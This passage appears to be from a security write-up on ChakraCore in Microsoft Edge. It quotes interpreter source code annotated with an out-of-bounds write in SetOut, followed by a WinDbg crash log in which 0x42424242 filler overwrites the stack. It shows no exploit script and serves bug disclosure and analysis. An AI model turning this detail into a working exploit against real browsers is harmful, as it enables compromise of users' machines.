funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);\r\n \r\n \r\n if (pnode->sxCall.spreadArgCount > 0)\r\n {\r\n Assert(spreadIndices != nullptr);\r\n uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32);\r\n uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc;\r\n byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,\r\n (uint16)actualArgCount, Js::CallIExtended_SpreadArgs,\r\n spreadIndices, spreadIndicesSize, callSiteId);\r\n }\r\n else\r\n {\r\n byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,\r\n (uint16)actualArgCount, callSiteId);\r\n }\r\n }\r\n \r\n Assert(argCount == actualArgCount);\r\n }\r\n \r\n // End call, pop param space\r\n funcInfo->EndRecordingOutArgs(argCount);\r\n return;\r\n}\r\n \r\n//ChakraCore-master\\lib\\Runtime\\Language\\InterpreterStackFrame.cpp\r\ninline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue)\r\n{\r\n Assert(m_outParams + outRegisterID < m_outSp); \r\n m_outParams[outRegisterID] = aValue; //OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only \r\n}\r\n \r\n//ChakraCore-master\\lib\\Runtime\\Language\\InterpreterStackFrame.cpp\r\n Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)\r\n {\r\n \r\n#ifdef ENABLE_DEBUG_CONFIG_OPTIONS\r\n // Support for simulating partially initialized interpreter stack frame.\r\n InterpreterThunkStackCountTracker tracker;\r\n \r\n if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) &&\r\n CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount())\r\n {\r\n switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType))\r\n {\r\n case 0:\r\n DebugBreak();\r\n break;\r\n case 1:\r\n Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError);\r\n break;\r\n default:\r\n DebugBreak();\r\n }\r\n }\r\n#endif\r\n ScriptContext* functionScriptContext = function->GetScriptContext();\r\n ThreadContext * threadContext = functionScriptContext->GetThreadContext();\r\n Assert(!threadContext->IsDisableImplicitException());\r\n functionScriptContext->VerifyAlive(!function->IsExternal());\r\n Assert(threadContext->IsScriptActive());\r\n Assert(threadContext->IsInScript());\r\n \r\n FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody();\r\n#ifdef ENABLE_DEBUG_CONFIG_OPTIONS\r\n if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch\r\n {\r\n if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode())\r\n {\r\n Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode\r\n }\r\n else\r\n {\r\n Throw::FatalInternalError();\r\n }\r\n }\r\n#endif\r\n \r\n if (executeFunction->GetInterpretedCount() == 0)\r\n {\r\n executeFunction->TraceInterpreterExecutionMode();\r\n }\r\n \r\n \r\n class AutoRestore\r\n {\r\n private:\r\n ThreadContext *const threadContext;\r\n const uint8 savedLoopDepth;\r\n \r\n public:\r\n AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction)\r\n : threadContext(threadContext),\r\n savedLoopDepth(threadContext->LoopDepth())\r\n {\r\n if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction())\r\n {\r\n executeFunction->SetWasCalledFromLoop();\r\n }\r\n }\r\n \r\n ~AutoRestore()\r\n {\r\n threadContext->SetLoopDepth(savedLoopDepth);\r\n }\r\n } autoRestore(threadContext, executeFunction);\r\n \r\n#if ENABLE_PROFILE_INFO\r\n DynamicProfileInfo * dynamicProfileInfo = nullptr;\r\n const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter ||\r\n (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction));\r\n if (doProfile)\r\n {\r\n#if !DYNAMIC_INTERPRETER_THUNK\r\n executeFunction->EnsureDynamicProfileInfo();\r\n#endif\r\n dynamicProfileInfo = executeFunction->GetDynamicProfileInfo();\r\n threadContext->ClearImplicitCallFlags();\r\n }\r\n#else\r\n const bool doProfile = false;\r\n#endif\r\n \r\n executeFunction->IncreaseInterpretedCount();\r\n#ifdef BGJIT_STATS\r\n functionScriptContext->interpretedCount++;\r\n functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount());\r\n#endif\r\n \r\n AssertMsg(!executeFunction->IsDeferredParseFunction(),\r\n \"Non-intrinsic functions must provide byte-code to execute\");\r\n \r\n executeFunction->BeginExecution();\r\n \r\n bool fReleaseAlloc = false;\r\n InterpreterStackFrame* newInstance = nullptr;\r\n Var* allocation = nullptr;\r\n \r\n if (!isAsmJs && executeFunction->IsCoroutine())\r\n {\r\n // If the FunctionBody is a generator then this call is being made by one of the three\r\n // generator resuming methods: next(), throw(), or return(). They all pass the generator\r\n // object as the first of two arguments. The real user arguments are obtained from the\r\n // generator object. The second argument is the ResumeYieldData which is only needed\r\n // when resuming a generator and so it only used here if a frame already exists on the\r\n // generator object.\r\n AssertMsg(args.Info.Count == 2, \"Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer\");\r\n JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]);\r\n newInstance = generator->GetFrame();\r\n \r\n if (newInstance != nullptr)\r\n {\r\n ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]);\r\n newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData);\r\n \r\n // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so\r\n // give the InterpreterStackFrame a legit enough stack address to make this comparison work.\r\n newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator);\r\n }\r\n else\r\n {\r\n //\r\n // Allocate a new InterpreterStackFrame instance on the recycler heap.\r\n // It will live with the JavascriptGenerator object.\r\n //\r\n Arguments generatorArgs = generator->GetArguments();\r\n InterpreterStackFrame::Setup setup(function, generatorArgs);\r\n size_t varAllocCount = setup.GetAllocationVarCount();\r\n size_t varSizeInBytes = varAllocCount * sizeof(Var);\r\n DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality\r\n Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? executeFunction->GetLoopHeaderArrayPtr() : nullptr;\r\n \r\n allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var);\r\n AnalysisAssert(allocation);\r\n#if DBG\r\n // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame\r\n Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var);\r\n AnalysisAssert(invalidVar);\r\n memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject));\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar);\r\n#else\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr);\r\n#endif\r\n \r\n newInstance->m_reader.Create(executeFunction);\r\n \r\n generator->SetFrame(newInstance, varSizeInBytes);\r\n }\r\n }\r\n else\r\n {\r\n InterpreterStackFrame::Setup setup(function, args);\r\n size_t varAllocCount = setup.GetAllocationVarCount();\r\n size_t varSizeInBytes = varAllocCount * sizeof(Var);\r\n \r\n //\r\n // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.\r\n //\r\n DWORD_PTR stackAddr;\r\n \r\n // If the locals area exceeds a certain limit, allocate it from a private arena rather than\r\n // this frame. The current limit is based on an old assert on the number of locals we would allow here.\r\n if (varAllocCount > InterpreterStackFrame::LocalsThreshold)\r\n {\r\n ArenaAllocator *tmpAlloc = nullptr;\r\n fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);\r\n allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);\r\n stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)\r\n }\r\n else\r\n {\r\n PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);\r\n allocation = (Var*)_alloca(varSizeInBytes);\r\n#if DBG\r\n memset(allocation, 0xFE, varSizeInBytes);\r\n#endif\r\n stackAddr = reinterpret_cast<DWORD_PTR>(allocation);\r\n }\r\n \r\n /*\r\n * If the function has any loop headers, we allocate an array for the loop headers wrappers, and\r\n * reference the wrappers in the array. We then push the pointer to the array onto the stack itself.\r\n * We do this so that while the function is being interpreted, we don't want the jitted loop\r\n * bodies to be collected, even if the loop body isn't being executed. The loop body will\r\n * get collected when the function has been JITted, and when the function exits the interpreter.\r\n * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but\r\n * it's cheaper to just copy them all into the recycler array rather than just the ones that\r\n * have been jitted.\r\n */\r\n Var loopHeaderArray = nullptr;\r\n \r\n if (executeFunction->GetHasAllocatedLoopHeaders())\r\n {\r\n // Loop header array is recycler allocated, so we push it on the stack\r\n // When we scan the stack, we'll recognize it as a recycler allocated\r\n // object, and mark it's contents and keep the individual loop header\r\n // wrappers alive\r\n loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr();\r\n }\r\n \r\n#if DBG\r\n Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject));\r\n memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject));\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar);\r\n#else\r\n newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr);\r\n#endif\r\n \r\n newInstance->m_reader.Create(executeFunction);\r\n }\r\n //\r\n // Execute the function's byte-code, returning the return-value:\r\n // - Mark that the function is current executing and may not be modified.\r\n //\r\n \r\n#if ENABLE_TTD\r\n TTD::TTDExceptionFramePopper exceptionFramePopper;\r\n if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))\r\n {\r\n bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock);\r\n \r\n threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally);\r\n exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function);\r\n }\r\n#endif\r\n \r\n Var aReturn = nullptr;\r\n \r\n {\r\n if (!isAsmJs && executeFunction->IsInDebugMode())\r\n {\r\n#if DYNAMIC_INTERPRETER_THUNK\r\n PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);\r\n aReturn = newInstance->DebugProcess();\r\n#else\r\n aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());\r\n#endif\r\n }\r\n else\r\n {\r\n#if DYNAMIC_INTERPRETER_THUNK\r\n PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);\r\n aReturn = newInstance->Process();\r\n#else\r\n aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());\r\n#endif\r\n }\r\n }\r\n \r\n executeFunction->EndExecution();\r\n \r\n#if ENABLE_TTD\r\n if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))\r\n {\r\n exceptionFramePopper.PopInfo();\r\n threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn);\r\n }\r\n#endif\r\n \r\n if (fReleaseAlloc)\r\n {\r\n functionScriptContext->ReleaseInterpreterArena();\r\n }\r\n \r\n#if ENABLE_PROFILE_INFO\r\n if (doProfile)\r\n {\r\n dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags());\r\n }\r\n#endif\r\n \r\n if (isAsmJs)\r\n {\r\n return newInstance;\r\n }\r\n return aReturn;\r\n }\r\n \r\n \r\nMicrosoft (R) Windows Debugger Version 6.12.0002.633 AMD64\r\nCopyright (c) Microsoft Corporation. All rights reserved.\r\n \r\n*** wait with pending attach\r\nSymbol search path is: SRV*c:\\mysymbol* http://msdl.microsoft.com/download/symbols\r\nExecutable search path is: \r\nModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000 C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdgeCP.exe\r\nModLoad: 00007ffe`a1ea0000 00007ffe`a207b000 C:\\Windows\\SYSTEM32\\ntdll.dll\r\nModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000 C:\\Windows\\System32\\KERNEL32.DLL\r\nModLoad: 00007ffe`9e590000 00007ffe`9e7d9000 C:\\Windows\\System32\\KERNELBASE.dll\r\nModLoad: 00007ffe`9c900000 00007ffe`9c97e000 C:\\Windows\\SYSTEM32\\apphelp.dll\r\nModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000 C:\\Windows\\System32\\combase.dll\r\nModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000 C:\\Windows\\System32\\ucrtbase.dll\r\nModLoad: 00007ffe`a0d00000 00007ffe`a0e25000 C:\\Windows\\System32\\RPCRT4.dll\r\nModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000 C:\\Windows\\System32\\bcryptPrimitives.dll\r\nModLoad: 00007ffe`a0c50000 00007ffe`a0ced000 C:\\Windows\\System32\\msvcrt.dll\r\nModLoad: 00007ffe`98900000 00007ffe`98960000 C:\\Windows\\SYSTEM32\\wincorlib.DLL\r\nModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000 C:\\Windows\\System32\\OLEAUT32.dll\r\nModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000 C:\\Windows\\System32\\msvcp_win.dll\r\nModLoad: 00007ffe`9e330000 00007ffe`9e341000 C:\\Windows\\System32\\kernel.appcore.dll\r\nModLoad: 00007ffe`7d930000 00007ffe`7dcf4000 C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\EdgeContent.dll\r\nModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000 C:\\Windows\\System32\\Windows.Storage.dll\r\nModLoad: 00007ffe`a0b90000 00007ffe`a0c31000 C:\\Windows\\System32\\advapi32.dll\r\nModLoad: 00007ffe`9f400000 00007ffe`9f459000 C:\\Windows\\System32\\sechost.dll\r\nModLoad: 00007ffe`96080000 00007ffe`96306000 C:\\Windows\\SYSTEM32\\iertutil.dll\r\nModLoad: 00007ffe`a13b0000 00007ffe`a1401000 C:\\Windows\\System32\\shlwapi.dll\r\nModLoad: 00007ffe`a0e30000 00007ffe`a0eda000 C:\\Windows\\System32\\shcore.dll\r\nModLoad: 00007ffe`9f460000 00007ffe`9f487000 C:\\Windows\\System32\\GDI32.dll\r\nModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000 C:\\Windows\\System32\\gdi32full.dll\r\nModLoad: 00007ffe`a1c90000 00007ffe`a1dda000 C:\\Windows\\System32\\USER32.dll\r\nModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000 C:\\Windows\\System32\\win32u.dll\r\nModLoad: 00007ffe`9e370000 00007ffe`9e3bc000 C:\\Windows\\System32\\powrprof.dll\r\nModLoad: 00007ffe`9e310000 00007ffe`9e325000 C:\\Windows\\System32\\profapi.dll\r\nModLoad: 00007ffe`9e210000 00007ffe`9e239000 C:\\Windows\\SYSTEM32\\USERENV.dll\r\nModLoad: 00007ffe`8d040000 00007ffe`8d066000 C:\\Windows\\SYSTEM32\\clipc.dll\r\nModLoad: 00007ffe`9d610000 00007ffe`9d641000 C:\\Windows\\SYSTEM32\\ntmarta.dll\r\nModLoad: 00007ffe`9dd60000 00007ffe`9dd77000 C:\\Windows\\SYSTEM32\\cryptsp.dll\r\nModLoad: 00007ffe`9d9a0000 00007ffe`9da44000 C:\\Windows\\SYSTEM32\\DNSAPI.dll\r\nModLoad: 00007ffe`a18b0000 00007ffe`a191c000 C:\\Windows\\System32\\WS2_32.dll\r\nModLoad: 00007ffe`a0b20000 00007ffe`a0b28000 C:\\Windows\\System32\\NSI.dll\r\nModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000 C:\\Windows\\System32\\IMM32.DLL\r\nModLoad: 00007ffe`9d960000 00007ffe`9d997000 C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL\r\nModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000 C:\\Windows\\SYSTEM32\\twinapi.appcore.dll\r\nModLoad: 00007ffe`9e1e0000 00007ffe`9e205000 C:\\Windows\\SYSTEM32\\bcrypt.dll\r\nModLoad: 00007ffe`9d440000 00007ffe`9d461000 C:\\Windows\\SYSTEM32\\profext.dll\r\nModLoad: 00007ffe`8c940000 00007ffe`8c9b4000 C:\\Windows\\SYSTEM32\\msiso.dll\r\nModLoad: 00007ffe`983e0000 00007ffe`98402000 C:\\Windows\\SYSTEM32\\EShims.dll\r\nModLoad: 00007ffe`90b10000 00007ffe`90b2b000 C:\\Windows\\SYSTEM32\\MPR.dll\r\nModLoad: 00007ffe`a1920000 00007ffe`a1a65000 C:\\Windows\\System32\\ole32.dll\r\nModLoad: 00007ffe`9cab0000 00007ffe`9cb45000 C:\\Windows\\system32\\uxtheme.dll\r\nModLoad: 00007ffe`8b6f0000 00007ffe`8b791000 C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll\r\nModLoad: 00007ffe`81fa0000 00007ffe`83651000 C:\\Windows\\SYSTEM32\\edgehtml.dll\r\nModLoad: 00007ffe`9a690000 00007ffe`9a7c9000 C:\\Windows\\SYSTEM32\\wintypes.dll\r\nModLoad: 00007ffe`915c0000 00007ffe`915ff000 C:\\Windows\\SYSTEM32\\MLANG.dll\r\nModLoad: 00007ffe`80f50000 00007ffe`8173a000 C:\\Windows\\SYSTEM32\\chakra.dll\r\nModLoad: 00007ffe`9afe0000 00007ffe`9b056000 C:\\Windows\\SYSTEM32\\policymanager.dll\r\nModLoad: 00007ffe`9af20000 00007ffe`9afaf000 C:\\Windows\\SYSTEM32\\msvcp110_win.dll\r\nModLoad: 00007ffe`9b2d0000 00007ffe`9b466000 C:\\Windows\\SYSTEM32\\PROPSYS.dll\r\nModLoad: 00007ffe`88e90000 00007ffe`88f5b000 C:\\Windows\\System32\\ieproxy.dll\r\nModLoad: 00007ffe`98590000 00007ffe`98696000 C:\\Windows\\System32\\Windows.UI.dll\r\nModLoad: 00007ffe`98500000 00007ffe`98582000 C:\\Windows\\SYSTEM32\\TextInputFramework.dll\r\nModLoad: 00007ffe`99ad0000 00007ffe`99da2000 C:\\Windows\\SYSTEM32\\CoreUIComponents.dll\r\nModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000 C:\\Windows\\SYSTEM32\\CoreMessaging.dll\r\nModLoad: 00007ffe`9ae40000 00007ffe`9ae55000 C:\\Windows\\SYSTEM32\\usermgrcli.dll\r\nModLoad: 00007ffe`98f20000 00007ffe`99451000 C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll\r\nModLoad: 00007ffe`9b470000 00007ffe`9b49a000 C:\\Windows\\SYSTEM32\\dwmapi.dll\r\nModLoad: 00007ffe`9f490000 00007ffe`a08c7000 C:\\Windows\\System32\\shell32.dll\r\nModLoad: 00007ffe`9ec30000 00007ffe`9ec79000 C:\\Windows\\System32\\cfgmgr32.dll\r\nModLoad: 00007ffe`a08d0000 00007ffe`a0a36000 C:\\Windows\\System32\\msctf.dll\r\nModLoad: 00007ffe`98700000 00007ffe`98802000 C:\\Windows\\SYSTEM32\\mrmcorer.dll\r\nModLoad: 00007ffe`8d070000 00007ffe`8d39e000 C:\\Windows\\SYSTEM32\\WININET.dll\r\nModLoad: 00007ffe`9e240000 00007ffe`9e270000 C:\\Windows\\SYSTEM32\\SspiCli.dll\r\nModLoad: 00007ffe`98860000 00007ffe`988c9000 C:\\Windows\\SYSTEM32\\Bcp47Langs.dll\r\nModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000 C:\\Windows\\SYSTEM32\\tokenbinding.dll\r\nModLoad: 00007ffe`8d800000 00007ffe`8d81b000 C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll\r\nModLoad: 00007ffe`963d0000 00007ffe`964a7000 C:\\Windows\\SYSTEM32\\winhttp.dll\r\nModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000 C:\\Windows\\system32\\mswsock.dll\r\nModLoad: 00007ffe`9a290000 00007ffe`9a29b000 C:\\Windows\\SYSTEM32\\WINNSI.DLL\r\nModLoad: 00007ffe`957f0000 00007ffe`959b8000 C:\\Windows\\SYSTEM32\\urlmon.dll\r\nModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000 C:\\Windows\\SYSTEM32\\CRYPTBASE.DLL\r\nModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000 C:\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll\r\nModLoad: 00007ffe`7fed0000 00007ffe`8005a000 C:\\Windows\\SYSTEM32\\ieapfltr.dll\r\nModLoad: 00007ffe`999d0000 00007ffe`999ed000 C:\\Windows\\System32\\rmclient.dll\r\nModLoad: 00007ffe`89aa0000 00007ffe`89ab8000 C:\\Windows\\System32\\UiaManager.dll\r\nModLoad: 00007ffe`8a860000 00007ffe`8a8a7000 C:\\Windows\\system32\\dataexchange.dll\r\nModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000 C:\\Windows\\SYSTEM32\\dcomp.dll\r\nModLoad: 00007ffe`9b940000 00007ffe`9bc1f000 C:\\Windows\\SYSTEM32\\d3d11.dll\r\nModLoad: 00007ffe`9d180000 00007ffe`9d224000 C:\\Windows\\SYSTEM32\\dxgi.dll\r\nModLoad: 00007ffe`8bb90000 00007ffe`8bc12000 C:\\Windows\\system32\\twinapi.dll\r\nModLoad: 00007ffe`84db0000 00007ffe`84e2a000 C:\\Windows\\SYSTEM32\\windows.ui.core.textinput.dll\r\nModLoad: 00007ffe`81c30000 00007ffe`81c58000 C:\\Windows\\SYSTEM32\\srpapi.dll\r\nModLoad: 00007ffe`9e3c0000 00007ffe`9e589000 C:\\Windows\\System32\\CRYPT32.dll\r\nModLoad: 00007ffe`9e350000 00007ffe`9e361000 C:\\Windows\\System32\\MSASN1.dll\r\nModLoad: 00007ffe`846e0000 00007ffe`8473a000 C:\\Windows\\System32\\Windows.Graphics.dll\r\nModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000 C:\\Windows\\SYSTEM32\\ninput.dll\r\nModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000 C:\\Windows\\SYSTEM32\\d2d1.dll\r\nModLoad: 00007ffe`943a0000 00007ffe`94660000 C:\\Windows\\SYSTEM32\\DWrite.dll\r\nModLoad: 00007ffe`81910000 00007ffe`8191f000 C:\\Windows\\System32\\Windows.Internal.SecurityMitigationsBroker.dll\r\nModLoad: 00007ffe`99510000 00007ffe`99552000 C:\\Windows\\SYSTEM32\\vm3dum64.dll\r\nModLoad: 00007ffe`994a0000 00007ffe`99507000 C:\\Windows\\SYSTEM32\\D3D10Level9.dll\r\nModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000 C:\\Windows\\System32\\oleacc.dll\r\nModLoad: 00007ffe`81bf0000 00007ffe`81c00000 C:\\Windows\\system32\\msimtf.dll\r\nModLoad: 00007ffe`940f0000 00007ffe`94178000 C:\\Windows\\system32\\directmanipulation.dll\r\nModLoad: 00007ffe`98170000 00007ffe`98184000 C:\\Windows\\System32\\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll\r\nModLoad: 00007ffe`81bb0000 00007ffe`81be8000 C:\\Windows\\System32\\smartscreenps.dll\r\nModLoad: 00007ffe`94210000 00007ffe`94398000 C:\\Windows\\SYSTEM32\\windows.globalization.dll\r\nModLoad: 00007ffe`8b520000 00007ffe`8b6e5000 C:\\Windows\\System32\\uiautomationcore.dll\r\n(1590.5d8): Break instruction exception - code 80000003 (first chance)\r\nntdll!DbgBreakPoint:\r\n00007ffe`a1f48d70 cc int 3\r\n0:035> g\r\nonecoreuap\\inetcore\\urlmon\\zones\\zoneidentifier.cxx(359)\\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 \u0153\u00b5\u00d5\u2265\u2019\u201c\u2264\u00aa\u00b5\u03a9\u00f7\u220f\u2202\u00ae\u00b5\u0192\u0152\u0192\u00ba\u02db\u00b0\u00a3\r\n(1590.b70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\nchakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:\r\n00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????\r\n0:016> r\r\nrax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98\r\nrdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025\r\nrip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00\r\n r8=000000d8b83f9d20 r9=000002aa8688fe00 r10=000002aa86879760\r\nr11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270\r\nr14=0000000000000000 r15=000002aa98205cc2\r\niopl=0 nv up ei pl nz ac pe nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212\r\nchakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:\r\n00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????\r\n0:016> dq ecx\r\n000000d8`b83f9e98 00000000`00000030 000002aa`86879760\r\n000000d8`b83f9ea8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9eb8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ec8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ed8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ee8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9ef8 00010000`42424242 00010000`42424242\r\n000000d8`b83f9f08 00010000`42424242 00010000`42424242\r\n0:016> dq [ecx+edx*8]\r\n000000d8`b8400000 ????????`???????? ????????`????????\r\n000000d8`b8400010 ????????`???????? ????????`????????\r\n000000d8`b8400020 ????????`???????? ????????`????????\r\n000000d8`b8400030 ????????`???????? ????????`????????\r\n000000d8`b8400040 ????????`???????? ????????`????????\r\n000000d8`b8400050 ????????`???????? ????????`????????\r\n000000d8`b8400060 ????????`???????? ????????`????????\r\n000000d8`b8400070 ????????`???????? ????????`????????\r\n0:016> !address 000000d8`b8400000 \r\n \r\n \r\nUsage: \r\nAllocation Base: 000000d8`b8400000\r\nBase Address: 000000d8`b8400000\r\nEnd Address: 000000d8`b84fc000\r\nRegion Size: 00000000`000fc000\r\nType: 00020000 MEM_PRIVATE\r\nState: 00002000 MEM_RESERVE\r\nProtect: 00000000 \r\nMore info: ~17k\r\n \r\n0:016> !address ecx\r\nUsage: Stack\r\nAllocation Base: 000000d8`b7a00000\r\nBase Address: 000000d8`b83f4000\r\nEnd Address: 000000d8`b8400000\r\nRegion Size: 00000000`0000c000\r\nType: 00020000 MEM_PRIVATE\r\nState: 00001000 MEM_COMMIT\r\nProtect: 00000004 PAGE_READWRITE\r\nMore info: ~16k\r\n \r\n0:016> kb\r\nRetAddr : Args to Child : Call Site\r\n00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d\r\n00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5\r\n00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 